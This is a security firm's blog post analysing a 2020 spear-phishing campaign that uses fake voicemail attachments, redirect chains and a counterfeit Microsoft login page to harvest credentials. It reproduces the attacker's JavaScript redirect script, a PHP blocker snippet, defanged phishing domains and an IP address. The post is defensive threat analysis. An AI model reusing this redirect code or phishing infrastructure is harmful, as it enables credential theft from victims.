Social distancing times are social engineering times

12.Jun.2020

Martin Jartelius, CSO, Outpost24

Ghost Labs

Recently, we encountered an attacker who had taken efficient spear-phishing to an interesting and increased level of consistency and automation. We’ve also seen firsthand the speed at which this attacker learned from some initial mistakes to launch their successful attack which we identify in the examples in this blog.

Pretty much anyone working in IT security will tell you that 2020 has been the year of phishing, and social distancing has contributed in a variety of ways to its popularity with the hacking community. Pre-pandemic, it would have been (in many organizations) extremely unlikely to get instructions to add new payment recipients via a stressed email, however, now that’s more likely to be the case. Before Covid-19 hit and changed everything it was unlikely that accounts teams missed payments or that an invoice went unnoticed, but it is increasingly feasible as we are forced to work remotely and cracks start to form between teams. An increased reliance on remote working, and a change in our normal day-to-day routines, have essentially lowered our security defenses.

At Outpost24 we do not specialize in defending against phishing, we specialize in identifying risks before they become incidents, be it via vulnerability management, web application security, cloud security or identifying rogue wireless devices. We also perform red team assessments for organizations ready to test their assumptions, who think their security defenses are in place and want to get these defenses realistically challenged by experts in order to be 100% confident they cannot be breached

As a business who performs in depth and targeted security testing for our customers our employees can also be at risk of phishing and can be targets of malicious threat actors. Therefore, with a degree of interest we follow some very targeted attacks closely in this blog article to see who may be directing these attacks at our organization to provide you with guidance and what to look out for in a suspect phishing attack.

Recently, we encountered an attacker who had taken efficient spear-phishing to an interesting and increased level of consistency and automation. We’ve also seen firsthand the speed at which this attacker learned from some initial mistakes to launch the attack which we identify in the examples in this blog.

Phishing investigation, May 2020

My colleague Johan Tullberg, a former information security specialist now heading up our Nordics region in the sales organization, reached out with yet another attempted phishing email as it was somewhat above and beyond what we see every day. We all appreciate decent craftsmanship when we see it, and this was decent.

We have seen this before, or at least variants thereof, but never felt sufficiently interested to investigate them in-depth and to see what kind of rabbit-hole these messages lead us to uncover. Based on the recent increase in attack frequency we decided to find out what exactly we are looking at.

Attached to the email is a file that has a few phone symbols and Johan’s name in its filename. It is a HTML resource, i.e. “a web page”, and as such can be opened with any Internet browser. It’s a 784 characters long string, so nothing massive, most likely a link, redirection, small script or similar. After downloading the attachment and opening it in an editor, we get the following (email redacted because, well, phishing).

After decoding the obfuscated content, we ended up with something more readable, brackets added to avoid preloads and accidental clicks:

Which in turn is an instruction for a web browser to instead if the local HTML-file, goes to the indicted page at the world[o]p[t]icpet.com-website.

First we start by finding out what server this is, and where it is located

$ nslookup w[o]rldopticpet.com

Name: w[o]rldopticpet.com
Address: 194.67.90.118
primary name server = dns1.p02.nsone.net
responsible mail addr = hostmaster.nsone.net

RIPE lookup of IP
inetnum: 194.67.84.0 - 194.67.94.255
netname: RU-REGRU-940712
country: RU

Right, a Russian web host that has a voicemail message for us for Office365? Oh well.

So, next step is to request the resource we are being directed to. Note that "Johan" and his email-address are likely parameters used by the phishers to find out who clicked, and there is no reason to allow those to be logged, so they have been replaced in our requests.:

GET /Analyst/redacted@example.com HTTP/1.0 Host: w[o]rldopticpet.com

Following our request, we received the following response from the web server:

HTTP/1.1 200 OK
Date: Wed, 20 May 2020 06:53:16 GMT
Server: Apache
refresh: 0;url=hxxps://[o]bjectstorage.us-ashburn-1.oraclecloud.com/n/idcpv4rkpzql/b/yangmlcrosoft-20200519-1946/o/oauthcommonsent.html#redacted@example.com
Connection: close
Content-Type: text/html; charset=UTF-8

Yet another redirect, so we follow the second redirection:

GET /n/idcpv4rkpzql/b/yangmlcrosoft-20200519-1946/o/oauthcommonsent.html HTTP/1.0 Host: [o]bjectstorage.us-ashburn-1.oraclecloud.com

Which presents us with their final goal: A fake Microsoft login page built to collect credentials from victims who fall for this decent quality phishing web page.

In the URL we’ve noticed an interesting part of the resource:

yangmlcrosoft-20200519-1946

So, likely, this site was spun up at 2020-05-19 at 19:46, which sounds like a fair guess based on other timestamps noted in the review. Using some automation, automated CI/CD phishing and scalable cloud infrastructure. Cool. Lazy phisherman… So, under the hood and some hundred lines into the fake login page we have some functionality of interest.

What this means - If you attempt to login, it will send credentials onto another system, and finally redirect to an archive file of a recording. Now, being curious cats, we of course wonder:

“What would a Russian hacker attempting to steal Johan’s credentials want Johan to listen to?”

So, we derail for a moment looking closer at this voicemail, because why not? We are doing the review for our personal curiosity and amusement after all.

The link: hxxps://ia802906.us.archive.org/29/items/voicemail_201810/message.wav HTTP/1.1

Redirects to: hxxps://archive.org/download/voicemail_201810/message.wav

Which in turn, redirects to: hxxps://ia802807.us.archive.org/33/items/voicemail_201810/message.wav

Funnily enough, this is an actual archived voicemail of a telemarketer talking about office supplies and printer services. Cute. Mark Leone from Companyname Office Supplies. I mean – This is QUALITY, we have the right to get frauded with style, and here we even GET OUR VOICEMAIL. Cute, funny, creepy, all in one package. Awesome.

“Mark Leone from Companyname office supply and printing I was just trying to get in touch with you one last time in regards to your office supply needs.

I've left several messages for you I'd love to help you out with anything you might need whether it be office supplies janitorial or something printed so when you get a chance please give me a call.“

Transcription courtesy of https://speech-to-text-demo.ng.bluemix.net/ (exact wording maybe slightly off).

Oh, right, so back to the credentials harvesting.

If we look up the IP address for the lulubellestudio-home domain to which our credentials are submitted, we see a familiar IP:

Name: [l]ulubellestudio-home.com
Address: 194.67.90.118
primary name server = dns1.p05.nsone.net
responsible mail addr = hostmaster.nsone.net

This is the same server/IP as where we started, but now with a different domain name. So, the attacker is using the same server for hosting this content. A bit lazy and cheap of them.

Going to the server root first, https://[l][u][l]ubellestudio-home.com/, The server is configured with directory listings enabled, and we can see that the only files on this server is the one receiving the harvesting

Index of /
cgi-bin/ 2020-05-19 17:49
next1.php 2020-05-19 19:10

Now, one might wonder why this is of any interest? Well, see how the cgi-bin folder is created at 17:49 LOCAL TIME where the server is, and the page for the phishing is spun up at 19:46 GMT, meaning that the attacker has done their initial deployment in 3 minutes including certificate setups. That is rather impressive for your average phishing attacker, significant time has been spent on not wasting time deploying new campaigns.

Looking at the information gathering php-file, it wants some specific information and I am not in the mood of drawing further attention, so I leave it alone after a first poke.

{"signal":"bad","msg":"Please fill in all the fields."}

Looking closer, the certificate was issued on the 19th to start the "spamming"

Subject CN=[l][u][l]ubellestudio-home.com
Issuer C=US, O=cPanel, Inc., L=Houston, ST=TX, CN=cPanel, Inc.
Certification Authority
Validity 19 maj 2020 — 17 aug. 2020

With the alternative DNS names

[l]ulubellestudio-home.com
[c]panel.lulubellestudio-home.com
[c]pcalendars.lulubellestudio-home.com
[c]pcontacts.lulubellestudio-home.com
[m]ail.lulubellestudio-home.com
[w]ebdisk.lulubellestudio-home.com
[w]ebmail.lulubellestudio-home.com
[w]ww.lulubellestudio-home.com

And a second cert issued from LetsEncrypt

Subject CN=www.[l]ulubellestudio-home.com
Issuer C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3
Validity 19 maj 2020 — 17 aug. 2020

So, long story short. Had Johan opted to “listen to his voicemail”, a Russian attacker, hosting his files in the Kaliningrad region, or at least that’s where the web hotel is hosted, would now have access potentially to Salesforce and other systems, but definitely to Johan’s email and all files on SharePoint and Yammer Johan has access to. Hence the importance of having strong unique passwords and multi-factor authentication where possible, to mitigate the impact of even an attacker obtaining your credentials. And when you receive an unsolicited email, think twice before you click!

This example shows the lengths at which a hacker will go to gain access to your vital information. Thanks to the quick thinking of Johan, we were able to delve deeper and see for ourselves the techniques and processes a hacker goes through in an attempt to fool the recipient. Well, nice try!

Annex – Evolution of the attack

Now, this post could have ended here. Initially it was created as content for internal awareness training, but things happened making it more interesting to share with our wider audience.

Firstly, we received more instances of these attacks and we’ve started receiving other versions of phishing attacks, including “your email is almost full” versions proving hackers will go to extraordinary lengths and unfortunately aren’t put off by a global pandemic, they use this to their advantage.

Note that the below chain has substantial differences, but also some similarities to the example above. Most notably the chain of the attack does not start with the attacker’s own systems, and they end in virtualization environments hosted in the US, which in and of itself is indicative of substantial differences. But the exact same email is used in the initial attack and has been observed using the behaviour of email verification and the same final redirect and server- and php versions is used on the disposable infrastructure parts.

Note the green box at the top, which is an image the attacker has in their email and not a part of the Outlook interface.

At this point, the attacker is however no longer as open, if an email which has not received the spam is submitted and the redirection instead leads to the phishing page and redirects to Google. This started happening in the fake voicemail spams example above and uses very similar infrastructure setups in regards to the code, but consistently different sender domains – where SPF records are missing – and initial redirection domains. Some rely on existing websites which have an invalid redirection vulnerability, to front those legitimate links in the email forwarding traffic to recently registered domains for the actual phishing.

In one of the examples the attacker however for some reason put PHP code in an HTML document.

Following such a chain, starting with an invalid redirect on a likely innocent website.

GET /rd.htm?url=http[s]%3A%2F%2Fhrcbhehfhc-rfhhwhrhfhchaheq-1.web.app?email=analyst@example.com HTTP/1.1
Host: [b]bp.salesmanago.pl

This redirects to

GET /?email=analyst@example.com HTTP/1.1
Host: [h]rcbhehfhc-rfhhwhrhfhchaheq-1.web.app

The response includes this section, which in a php file would have executed on the server and likely is designed to prevent any investigation:

<?php
include('blocker.php');
$email = $_GET['email'];
?>

We then have a JavaScript based redirection to the next step in the chain. Remember this script

function getUrlVars() {
var vars = {};
var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) { vars[key] = value;
});
return vars;
}
var email = getUrlVars()['email'];
var redirect = "http[s]://change.jchfhtbsbnf-owabusiness-voiceaapp.club/"; // replace your link here
var urlFinal = redirect + "?e=" + email;
setTimeout(function () {
window.location.href = urlFinal; //will redirect to your blog page (an ex: blog.html)
}, 2000);

</script>

Following this, we have the next few disappointing steps:

Request:

GET /?e=analyst@example.com HTTP/1.1
Host: [c]hange.jchfhtbsbnf-owabusiness-voiceaapp.club

Response – redirection:

HTTP/1.1 302 Found Location: main

Request:

GET /main HTTP/1.1
Host: [c]hange.jchfhtbsbnf-owabusiness-voiceaapp.club

Response – redirection:

HTTP/1.1 301 Moved Permanently
Location: https://[c]hange.jchfhtbsbnf-owabusiness-voiceaapp.club/main/

Request:

GET /main/ HTTP/1.1 Host: [c]hange.jchfhtbsbnf-owabusiness-voiceaapp.club

Response – redirection:

HTTP/1.1 302 Found Location: https://www.google.com

So the last page at [c]hange.jchfhtbsbnf-owabusiness-voiceaapp.club/main where the part leading to the redirection over to Google, and ends the series of redirections in a rather disappointing way.

As the most interesting part here was the rather carelessly used page with PHP content that also included a script, we can note that parts of the script is used as examples on for example stack-exchange, but if we look for the use of the two rather unique comments in the script, we limit it down to two examples where this is indexed by Google.

One relates to sandbox analysis of suspected spam, showing in the details how the same content has been investigated by a US media company after getting the materials, and how it has been investigated by another security check service. The latter also shows other investigated phishing attacks where the same infrastructure has been used.

Looking close at this, we find the following which has been used in other, earlier, unrelated, attacks. This last part is not clearly linked to the current campaign, and the current campaign is loosely linked by the fact that they all started using the same prevention mechanisms after the initial review in May. It maybe several groups or individuals using similar automated tooling, or the same perpetrator executing a range of campaigns in parallel. The later attempts have shown a lower sophistication than the initially investigated campaign though.

Final words: Remain resilient and report anything that doesn’t look right

The final final words – As can be seen here, not only are these phishing emails of good quality and the infrastructure constantly changed, but also the methods of delivery are adapting. Not only that, if the initial attack and the second identical email, which used the later observed infrastructure, show the attackers are the same or related – they learnt from our initial investigative actions even when those were non-intrusive, adapted and changed their way of working to make our future analysis work harder.

Be careful out there, and if you get a strange email, call the sender or the one you would expect to be responsible, from a number you confirmed elsewhere than in the email.